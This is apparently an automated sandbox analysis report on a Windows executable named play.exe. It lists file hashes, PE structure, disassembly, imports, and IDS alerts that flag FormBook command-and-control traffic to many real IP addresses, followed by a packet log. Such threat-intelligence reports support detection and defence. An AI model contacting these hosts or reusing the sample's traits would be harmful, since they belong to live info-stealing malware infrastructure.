Entropy (8bit):	7.743705317631857
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	play.exe
File size:	382'976 bytes
MD5:	22b582f31bd1c3a4345df16db968b74c
SHA1:	0756ad4a5bb0afefb30e7fc0e581203b52ab515d
SHA256:	9c1aee7c67abdbfcafee208e0a64ab065cd336d550f1cd66fe91679e9253903a
SHA512:	71366f4a1d737580148b0a897defcccbd3df93e65b338ed4841f88c11120d509625a8fcbfb8762acbfb11edee5b5c5b2edefa3932a01d9b2e7acd51f0b71ab25
SSDEEP:	6144:vzammvyHJQDUMcYRqqvKnZPrzxyeL/KF1kcjRZFp8T1H8eOP+5VT:vzaPq+c/5ZDQLkc1ZmeCVT
TLSH:	DA840140F342F4A3C5A94971A93299B1176E7C466A34063B3B587AAB6FB01C30678F5F
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Q.-...C...C...C.z.....C.z...#.C.......C...B.E.C.z.....C.z.....C.z.....C.z.....C.Rich..C.................PE..L..._\.Z...........

File Icon


Icon Hash:	65c68c8c8685808b

Static PE Info

General

Entrypoint:	0x401c00
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x5A9F5C5F [Wed Mar 7 03:28:31 2018 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	5336b88f8194523f05b84e7576025da7

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
sub esp, 000003F4h
push ebx
push esi
push edi
push 000003D0h
lea eax, dword ptr [ebp-000003F0h]
push 00000000h
push eax
mov dword ptr [ebp-000003F4h], 00000000h
call 00007F9DC101FF9Ch
xor eax, eax
add esp, 0Ch
xor ebx, ebx
xor edi, edi
mov dword ptr [ebp-18h], 00006673h
mov dword ptr [ebp-08h], eax
mov dword ptr [ebp-04h], 00002D6Bh
mov dword ptr [ebp-20h], 00007185h
mov dword ptr [ebp-0Ch], 000019BEh
mov dword ptr [ebp-10h], 000076FBh
mov dword ptr [ebp-14h], 000071FFh
mov dword ptr [ebp-1Ch], 0000470Bh
xor esi, esi
inc esi
mov eax, 66666667h
imul esi
sar edx, 1
mov eax, edx
shr eax, 1Fh
add eax, edx
mov ecx, esi
lea eax, dword ptr [eax+eax*4]
sub ecx, eax
jne 00007F9DC101E143h
inc esi
cmp esi, 000041F5h
jl 00007F9DC101E11Fh
xor esi, esi
lea ecx, dword ptr [ecx+00h]
inc ebx
mov eax, ebx
and eax, 80000003h
jns 00007F9DC101E147h
dec eax
or eax, FFFFFFFCh
inc eax
jne 00007F9DC101E143h
inc ebx
cmp ebx, 00007270h
jl 00007F9DC101E128h
mov eax, 00003026h
mov edx, 0000006Eh
mov ecx, 000000D3h
lea esp, dword ptr [esp+00000000h]
cmp ecx, edx
cmovnle ecx, edx
dec eax
jne 00007F9DC101E13Ah

Rich Headers

Programming Language:

[C++] VS2010 build 30319
[ C ] VS2010 build 30319
[IMP] VS2008 SP1 build 30729
[ASM] VS2010 build 30319
[RES] VS2010 build 30319
[LNK] VS2010 build 30319

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x4d9dc	0x3c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x51000	0xf488	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x61000	0x5e8	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x4c000	0x12c	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x4a332	0x4a400	a8c742e473ab91bceca39d7b6310823c	False	0.9653731323653199	data	7.973595489277393	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x4c000	0x2086	0x2200	5af7b09d33020b7d6e3982fd5da068ea	False	0.32927389705882354	data	4.763080507959912	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x4f000	0x1b60	0xc00	b8d3df32f480b319241bc7d75121b42e	False	0.21451822916666666	Matlab v4 mat-file (little endian) \200, sparse, rows 3141592654, columns 1153374641	2.5005060272844073	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x51000	0xf488	0xf600	bf27eb57a1ff26dec8c90a0af6a24e61	False	0.5953696646341463	data	6.449462878903536	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x61000	0xb0e	0xc00	4c311f347fd29c54d944a4bf1380db17	False	0.4401041666666667	data	4.091003765705638	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x514d8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128	English	United States	0.5371621621621622
RT_ICON	0x51600	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	English	United States	0.33164739884393063
RT_ICON	0x51b68	0x1e8	Device independent bitmap graphic, 24 x 48 x 4, image size 288	English	United States	0.4139344262295082
RT_ICON	0x51d50	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	English	United States	0.3225806451612903
RT_ICON	0x52418	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 512	English	United States	0.34408602150537637
RT_ICON	0x52700	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	English	United States	0.384927797833935
RT_ICON	0x52fa8	0x668	Device independent bitmap graphic, 48 x 96 x 4, image size 1152	English	United States	0.24085365853658536
RT_ICON	0x53610	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	English	United States	0.3664712153518124
RT_ICON	0x544b8	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.43617021276595747
RT_ICON	0x54920	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	English	United States	0.2774590163934426
RT_ICON	0x552a8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States	0.2544559099437148
RT_ICON	0x56350	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States	0.18786307053941909
RT_ICON	0x588f8	0x6bfa	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States	0.9976846827291802
RT_ICON	0x5f4f4	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 512	English	United States	0.33064516129032256
RT_ICON	0x5f7dc	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024	English	United States	0.35424187725631767
RT_MENU	0x60084	0x4a	data	English	United States	0.8648648648648649
RT_DIALOG	0x600d0	0x130	data	English	United States	0.5855263157894737
RT_STRING	0x60200	0x3c	data	English	United States	0.45
RT_ACCELERATOR	0x6023c	0x10	data	English	United States	1.25
RT_GROUP_ICON	0x6024c	0xbc	data	English	United States	0.6063829787234043
RT_GROUP_ICON	0x60308	0x22	data	English	United States	1.1176470588235294
RT_MANIFEST	0x6032c	0x15a	ASCII text, with CRLF line terminators	English	United States	0.5491329479768786

Imports

DLL

Import

USER32.dll

EndDialog, PostQuitMessage, EndPaint, BeginPaint, DefWindowProcW, DestroyWindow, DialogBoxParamW, UpdateWindow, ShowWindow, CreateWindowExW, RegisterClassExW, LoadCursorW, LoadIconW, DispatchMessageW, TranslateMessage, TranslateAcceleratorW, GetMessageW, LoadAcceleratorsW, LoadStringW

KERNEL32.dll

EncodePointer, GetStringTypeW, MultiByteToWideChar, LCMapStringW, IsProcessorFeaturePresent, HeapReAlloc, HeapAlloc, HeapSize, WideCharToMultiByte, RtlUnwind, IsValidCodePage, GetOEMCP, GetACP, GetCPInfo, Sleep, HeapFree, LoadLibraryW, GetCommandLineW, HeapSetInformation, GetStartupInfoW, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, GetProcAddress, GetModuleHandleW, ExitProcess, DecodePointer, WriteFile, GetStdHandle, GetModuleFileNameW, FreeEnvironmentStringsW, GetEnvironmentStringsW, SetHandleCount, InitializeCriticalSectionAndSpinCount, GetFileType, DeleteCriticalSection, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, InterlockedIncrement, SetLastError, GetCurrentThreadId, GetLastError, InterlockedDecrement, HeapCreate, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, LeaveCriticalSection, EnterCriticalSection

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	Protocol	SID	Signature	Severity	Source Port	Dest Port	Source IP	Dest IP
2024-08-31T14:05:56.972571+0200	TCP	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	58125	80	192.168.2.4	52.71.57.184
2024-08-31T14:05:30.463644+0200	TCP	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	58117	80	192.168.2.4	200.58.111.42
2024-08-31T14:04:19.876027+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	58098	80	192.168.2.4	188.114.97.3
2024-08-31T14:06:11.114865+0200	TCP	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	58129	80	192.168.2.4	45.113.201.77
2024-08-31T14:03:50.988559+0200	TCP	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	58093	80	192.168.2.4	199.59.243.226
2024-08-31T14:06:44.938956+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	58138	80	192.168.2.4	35.244.245.121
2024-08-31T14:05:41.054857+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	58120	80	192.168.2.4	13.248.169.48
2024-08-31T14:05:27.929914+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	58116	80	192.168.2.4	200.58.111.42
2024-08-31T14:04:49.060422+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	58107	80	192.168.2.4	84.32.84.32
2024-08-31T14:04:51.616914+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	58108	80	192.168.2.4	84.32.84.32
2024-08-31T14:06:50.173718+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	58140	80	192.168.2.4	35.244.245.121
2024-08-31T14:04:54.158993+0200	TCP	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	58109	80	192.168.2.4	84.32.84.32
2024-08-31T14:05:49.403177+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	58122	80	192.168.2.4	52.71.57.184
2024-08-31T14:06:31.874894+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	58134	80	192.168.2.4	3.33.130.190
2024-08-31T14:06:52.705108+0200	TCP	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	58141	80	192.168.2.4	35.244.245.121
2024-08-31T14:04:35.922524+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	58103	80	192.168.2.4	85.159.66.93
2024-08-31T14:04:22.439664+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	58099	80	192.168.2.4	188.114.97.3
2024-08-31T14:07:03.874673+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	58144	80	192.168.2.4	188.114.96.3
2024-08-31T14:04:46.645721+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	58106	80	192.168.2.4	84.32.84.32
2024-08-31T14:06:58.437105+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	58142	80	192.168.2.4	188.114.96.3
2024-08-31T14:05:38.502411+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	58119	80	192.168.2.4	13.248.169.48
2024-08-31T14:05:10.760150+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	58111	80	192.168.2.4	154.23.184.218
2024-08-31T14:05:08.197843+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	58110	80	192.168.2.4	154.23.184.218
2024-08-31T14:06:33.388002+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	58135	80	192.168.2.4	3.33.130.190
2024-08-31T14:06:19.813353+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	58131	80	192.168.2.4	154.23.176.197
2024-08-31T14:06:17.326314+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	58130	80	192.168.2.4	154.23.176.197
2024-08-31T14:05:35.972685+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	58118	80	192.168.2.4	13.248.169.48
2024-08-31T14:04:06.693526+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	58094	80	192.168.2.4	3.33.244.179
2024-08-31T14:07:01.109106+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	58143	80	192.168.2.4	188.114.96.3
2024-08-31T14:04:33.380975+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	58102	80	192.168.2.4	85.159.66.93
2024-08-31T14:04:24.975487+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	58100	80	192.168.2.4	188.114.97.3
2024-08-31T14:04:09.262453+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	58095	80	192.168.2.4	3.33.244.179
2024-08-31T14:06:24.994886+0200	TCP	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	58133	80	192.168.2.4	154.23.176.197
2024-08-31T14:04:12.588807+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	58096	80	192.168.2.4	3.33.244.179
2024-08-31T14:06:47.545751+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	58139	80	192.168.2.4	35.244.245.121
2024-08-31T14:04:40.990766+0200	TCP	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	58105	80	192.168.2.4	85.159.66.93
2024-08-31T14:05:13.600380+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	58112	80	192.168.2.4	154.23.184.218
2024-08-31T14:05:51.863715+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	58123	80	192.168.2.4	52.71.57.184
2024-08-31T14:06:08.475007+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	58128	80	192.168.2.4	45.113.201.77
2024-08-31T14:05:54.420854+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	58124	80	192.168.2.4	52.71.57.184
2024-08-31T14:05:15.836052+0200	TCP	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	58113	80	192.168.2.4	154.23.184.218
2024-08-31T14:05:25.353633+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	58115	80	192.168.2.4	200.58.111.42
2024-08-31T14:05:43.637486+0200	TCP	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	58121	80	192.168.2.4	13.248.169.48
2024-08-31T14:06:36.001515+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	58136	80	192.168.2.4	3.33.130.190
2024-08-31T14:05:23.609814+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	58114	80	192.168.2.4	200.58.111.42
2024-08-31T14:06:03.316702+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	58126	80	192.168.2.4	45.113.201.77
2024-08-31T14:06:38.609677+0200	TCP	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	58137	80	192.168.2.4	3.33.130.190
2024-08-31T14:04:38.471609+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	58104	80	192.168.2.4	85.159.66.93
2024-08-31T14:04:27.549401+0200	TCP	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	58101	80	192.168.2.4	188.114.97.3
2024-08-31T14:06:22.638539+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	58132	80	192.168.2.4	154.23.176.197
2024-08-31T14:06:06.086824+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	58127	80	192.168.2.4	45.113.201.77
2024-08-31T14:04:14.366844+0200	TCP	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	58097	80	192.168.2.4	3.33.244.179

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 31, 2024 14:03:50.493005037 CEST	58093	80	192.168.2.4	199.59.243.226
Aug 31, 2024 14:03:50.498074055 CEST	80	58093	199.59.243.226	192.168.2.4
Aug 31, 2024 14:03:50.498183012 CEST	58093	80	192.168.2.4	199.59.243.226
Aug 31, 2024 14:03:50.506298065 CEST	58093	80	192.168.2.4	199.59.243.226
Aug 31, 2024 14:03:50.511121035 CEST	80	58093	199.59.243.226	192.168.2.4
Aug 31, 2024 14:03:50.988245964 CEST	80	58093	199.59.243.226	192.168.2.4
Aug 31, 2024 14:03:50.988447905 CEST	80	58093	199.59.243.226	192.168.2.4
Aug 31, 2024 14:03:50.988457918 CEST	80	58093	199.59.243.226	192.168.2.4
Aug 31, 2024 14:03:50.988559008 CEST	58093	80	192.168.2.4	199.59.243.226
Aug 31, 2024 14:03:50.992621899 CEST	58093	80	192.168.2.4	199.59.243.226
Aug 31, 2024 14:03:50.997435093 CEST	80	58093	199.59.243.226	192.168.2.4
Aug 31, 2024 14:04:06.226023912 CEST	58094	80	192.168.2.4	3.33.244.179
Aug 31, 2024 14:04:06.235270977 CEST	80	58094	3.33.244.179	192.168.2.4
Aug 31, 2024 14:04:06.235335112 CEST	58094	80	192.168.2.4	3.33.244.179
Aug 31, 2024 14:04:06.245716095 CEST	58094	80	192.168.2.4	3.33.244.179
Aug 31, 2024 14:04:06.252799988 CEST	80	58094	3.33.244.179	192.168.2.4
Aug 31, 2024 14:04:06.693347931 CEST	80	58094	3.33.244.179	192.168.2.4
Aug 31, 2024 14:04:06.693526030 CEST	58094	80	192.168.2.4	3.33.244.179
Aug 31, 2024 14:04:07.777281046 CEST	58094	80	192.168.2.4	3.33.244.179
Aug 31, 2024 14:04:08.077438116 CEST	58094	80	192.168.2.4	3.33.244.179
Aug 31, 2024 14:04:08.100661993 CEST	80	58094	3.33.244.179	192.168.2.4
Aug 31, 2024 14:04:08.100677967 CEST	80	58094	3.33.244.179	192.168.2.4
Aug 31, 2024 14:04:08.100780964 CEST	58094	80	192.168.2.4	3.33.244.179
Aug 31, 2024 14:04:08.789191008 CEST	58095	80	192.168.2.4	3.33.244.179
Aug 31, 2024 14:04:08.794024944 CEST	80	58095	3.33.244.179	192.168.2.4
Aug 31, 2024 14:04:08.794123888 CEST	58095	80	192.168.2.4	3.33.244.179
Aug 31, 2024 14:04:08.812155962 CEST	58095	80	192.168.2.4	3.33.244.179
Aug 31, 2024 14:04:08.817728996 CEST	80	58095	3.33.244.179	192.168.2.4
Aug 31, 2024 14:04:09.262358904 CEST	80	58095	3.33.244.179	192.168.2.4
Aug 31, 2024 14:04:09.262453079 CEST	58095	80	192.168.2.4	3.33.244.179
Aug 31, 2024 14:04:10.327959061 CEST	58095	80	192.168.2.4	3.33.244.179
Aug 31, 2024 14:04:10.333734989 CEST	80	58095	3.33.244.179	192.168.2.4
Aug 31, 2024 14:04:11.346461058 CEST	58096	80	192.168.2.4	3.33.244.179
Aug 31, 2024 14:04:11.351399899 CEST	80	58096	3.33.244.179	192.168.2.4
Aug 31, 2024 14:04:11.351485014 CEST	58096	80	192.168.2.4	3.33.244.179
Aug 31, 2024 14:04:11.369182110 CEST	58096	80	192.168.2.4	3.33.244.179
Aug 31, 2024 14:04:11.374435902 CEST	80	58096	3.33.244.179	192.168.2.4
Aug 31, 2024 14:04:11.374453068 CEST	80	58096	3.33.244.179	192.168.2.4
Aug 31, 2024 14:04:11.374461889 CEST	80	58096	3.33.244.179	192.168.2.4
Aug 31, 2024 14:04:11.374480009 CEST	80	58096	3.33.244.179	192.168.2.4
Aug 31, 2024 14:04:11.374490023 CEST	80	58096	3.33.244.179	192.168.2.4
Aug 31, 2024 14:04:11.374497890 CEST	80	58096	3.33.244.179	192.168.2.4
Aug 31, 2024 14:04:11.374516010 CEST	80	58096	3.33.244.179	192.168.2.4
Aug 31, 2024 14:04:11.374567032 CEST	80	58096	3.33.244.179	192.168.2.4
Aug 31, 2024 14:04:11.375186920 CEST	80	58096	3.33.244.179	192.168.2.4
Aug 31, 2024 14:04:12.588726044 CEST	80	58096	3.33.244.179	192.168.2.4
Aug 31, 2024 14:04:12.588807106 CEST	58096	80	192.168.2.4	3.33.244.179
Aug 31, 2024 14:04:12.588936090 CEST	80	58096	3.33.244.179	192.168.2.4
Aug 31, 2024 14:04:12.588979959 CEST	58096	80	192.168.2.4	3.33.244.179
Aug 31, 2024 14:04:12.589148045 CEST	80	58096	3.33.244.179	192.168.2.4
Aug 31, 2024 14:04:12.589185953 CEST	58096	80	192.168.2.4	3.33.244.179
Aug 31, 2024 14:04:12.874366045 CEST	58096	80	192.168.2.4	3.33.244.179
Aug 31, 2024 14:04:12.879278898 CEST	80	58096	3.33.244.179	192.168.2.4
Aug 31, 2024 14:04:13.893182039 CEST	58097	80	192.168.2.4	3.33.244.179
Aug 31, 2024 14:04:13.899712086 CEST	80	58097	3.33.244.179	192.168.2.4
Aug 31, 2024 14:04:13.899801016 CEST	58097	80	192.168.2.4	3.33.244.179
Aug 31, 2024 14:04:13.905962944 CEST	58097	80	192.168.2.4	3.33.244.179
Aug 31, 2024 14:04:13.910795927 CEST	80	58097	3.33.244.179	192.168.2.4
Aug 31, 2024 14:04:14.366570950 CEST	80	58097	3.33.244.179	192.168.2.4
Aug 31, 2024 14:04:14.366785049 CEST	80	58097	3.33.244.179	192.168.2.4
Aug 31, 2024 14:04:14.366843939 CEST	58097	80	192.168.2.4	3.33.244.179
Aug 31, 2024 14:04:14.369035006 CEST	58097	80	192.168.2.4	3.33.244.179
Aug 31, 2024 14:04:14.373775959 CEST	80	58097	3.33.244.179	192.168.2.4
Aug 31, 2024 14:04:19.395905018 CEST	58098	80	192.168.2.4	188.114.97.3
Aug 31, 2024 14:04:19.402777910 CEST	80	58098	188.114.97.3	192.168.2.4
Aug 31, 2024 14:04:19.402863026 CEST	58098	80	192.168.2.4	188.114.97.3
Aug 31, 2024 14:04:19.413223028 CEST	58098	80	192.168.2.4	188.114.97.3
Aug 31, 2024 14:04:19.419836044 CEST	80	58098	188.114.97.3	192.168.2.4
Aug 31, 2024 14:04:19.875938892 CEST	80	58098	188.114.97.3	192.168.2.4
Aug 31, 2024 14:04:19.875953913 CEST	80	58098	188.114.97.3	192.168.2.4
Aug 31, 2024 14:04:19.876027107 CEST	58098	80	192.168.2.4	188.114.97.3
Aug 31, 2024 14:04:19.876786947 CEST	80	58098	188.114.97.3	192.168.2.4
Aug 31, 2024 14:04:19.876840115 CEST	58098	80	192.168.2.4	188.114.97.3
Aug 31, 2024 14:04:20.921355009 CEST	58098	80	192.168.2.4	188.114.97.3
Aug 31, 2024 14:04:21.939835072 CEST	58099	80	192.168.2.4	188.114.97.3
Aug 31, 2024 14:04:21.945851088 CEST	80	58099	188.114.97.3	192.168.2.4
Aug 31, 2024 14:04:21.945943117 CEST	58099	80	192.168.2.4	188.114.97.3
Aug 31, 2024 14:04:21.956650019 CEST	58099	80	192.168.2.4	188.114.97.3
Aug 31, 2024 14:04:21.961549997 CEST	80	58099	188.114.97.3	192.168.2.4
Aug 31, 2024 14:04:22.439558029 CEST	80	58099	188.114.97.3	192.168.2.4
Aug 31, 2024 14:04:22.439604044 CEST	80	58099	188.114.97.3	192.168.2.4
Aug 31, 2024 14:04:22.439663887 CEST	58099	80	192.168.2.4	188.114.97.3
Aug 31, 2024 14:04:22.440316916 CEST	80	58099	188.114.97.3	192.168.2.4
Aug 31, 2024 14:04:22.442717075 CEST	58099	80	192.168.2.4	188.114.97.3
Aug 31, 2024 14:04:23.468112946 CEST	58099	80	192.168.2.4	188.114.97.3
Aug 31, 2024 14:04:24.486810923 CEST	58100	80	192.168.2.4	188.114.97.3
Aug 31, 2024 14:04:24.491755009 CEST	80	58100	188.114.97.3	192.168.2.4
Aug 31, 2024 14:04:24.491852999 CEST	58100	80	192.168.2.4	188.114.97.3
Aug 31, 2024 14:04:24.504113913 CEST	58100	80	192.168.2.4	188.114.97.3
Aug 31, 2024 14:04:24.509970903 CEST	80	58100	188.114.97.3	192.168.2.4
Aug 31, 2024 14:04:24.509991884 CEST	80	58100	188.114.97.3	192.168.2.4
Aug 31, 2024 14:04:24.510021925 CEST	80	58100	188.114.97.3	192.168.2.4
Aug 31, 2024 14:04:24.510030031 CEST	80	58100	188.114.97.3	192.168.2.4
Aug 31, 2024 14:04:24.510037899 CEST	80	58100	188.114.97.3	192.168.2.4
Aug 31, 2024 14:04:24.510531902 CEST	80	58100	188.114.97.3	192.168.2.4
Aug 31, 2024 14:04:24.510550976 CEST	80	58100	188.114.97.3	192.168.2.4
Aug 31, 2024 14:04:24.510574102 CEST	80	58100	188.114.97.3	192.168.2.4
Aug 31, 2024 14:04:24.510582924 CEST	80	58100	188.114.97.3	192.168.2.4
Aug 31, 2024 14:04:24.975390911 CEST	80	58100	188.114.97.3	192.168.2.4
Aug 31, 2024 14:04:24.975408077 CEST	80	58100	188.114.97.3	192.168.2.4
Aug 31, 2024 14:04:24.975486994 CEST	58100	80	192.168.2.4	188.114.97.3
Aug 31, 2024 14:04:24.976386070 CEST	80	58100	188.114.97.3	192.168.2.4
Aug 31, 2024 14:04:24.976440907 CEST	58100	80	192.168.2.4	188.114.97.3
Aug 31, 2024 14:04:26.039438009 CEST	58100	80	192.168.2.4	188.114.97.3
Aug 31, 2024 14:04:27.049861908 CEST	58101	80	192.168.2.4	188.114.97.3
Aug 31, 2024 14:04:27.054970026 CEST	80	58101	188.114.97.3	192.168.2.4
Aug 31, 2024 14:04:27.055057049 CEST	58101	80	192.168.2.4	188.114.97.3
Aug 31, 2024 14:04:27.062438011 CEST	58101	80	192.168.2.4	188.114.97.3
Aug 31, 2024 14:04:27.067255974 CEST	80	58101	188.114.97.3	192.168.2.4
Aug 31, 2024 14:04:27.549102068 CEST	80	58101	188.114.97.3	192.168.2.4
Aug 31, 2024 14:04:27.549197912 CEST	80	58101	188.114.97.3	192.168.2.4
Aug 31, 2024 14:04:27.549236059 CEST	80	58101	188.114.97.3	192.168.2.4
Aug 31, 2024 14:04:27.549401045 CEST	58101	80	192.168.2.4	188.114.97.3
Aug 31, 2024 14:04:27.549401045 CEST	58101	80	192.168.2.4	188.114.97.3
Aug 31, 2024 14:04:27.552270889 CEST	58101	80	192.168.2.4	188.114.97.3
Aug 31, 2024 14:04:27.557356119 CEST	80	58101	188.114.97.3	192.168.2.4
Aug 31, 2024 14:04:32.669925928 CEST	58102	80	192.168.2.4	85.159.66.93
Aug 31, 2024 14:04:32.674701929 CEST	80	58102	85.159.66.93	192.168.2.4
Aug 31, 2024 14:04:32.674781084 CEST	58102	80	192.168.2.4	85.159.66.93
Aug 31, 2024 14:04:32.685070038 CEST	58102	80	192.168.2.4	85.159.66.93
Aug 31, 2024 14:04:32.690762997 CEST	80	58102	85.159.66.93	192.168.2.4
Aug 31, 2024 14:04:33.380223036 CEST	80	58102	85.159.66.93	192.168.2.4
Aug 31, 2024 14:04:33.380927086 CEST	80	58102	85.159.66.93	192.168.2.4
Aug 31, 2024 14:04:33.380975008 CEST	58102	80	192.168.2.4	85.159.66.93
Aug 31, 2024 14:04:34.187043905 CEST	58102	80	192.168.2.4	85.159.66.93
Aug 31, 2024 14:04:35.209810019 CEST	58103	80	192.168.2.4	85.159.66.93
Aug 31, 2024 14:04:35.214684010 CEST	80	58103	85.159.66.93	192.168.2.4
Aug 31, 2024 14:04:35.214790106 CEST	58103	80	192.168.2.4	85.159.66.93
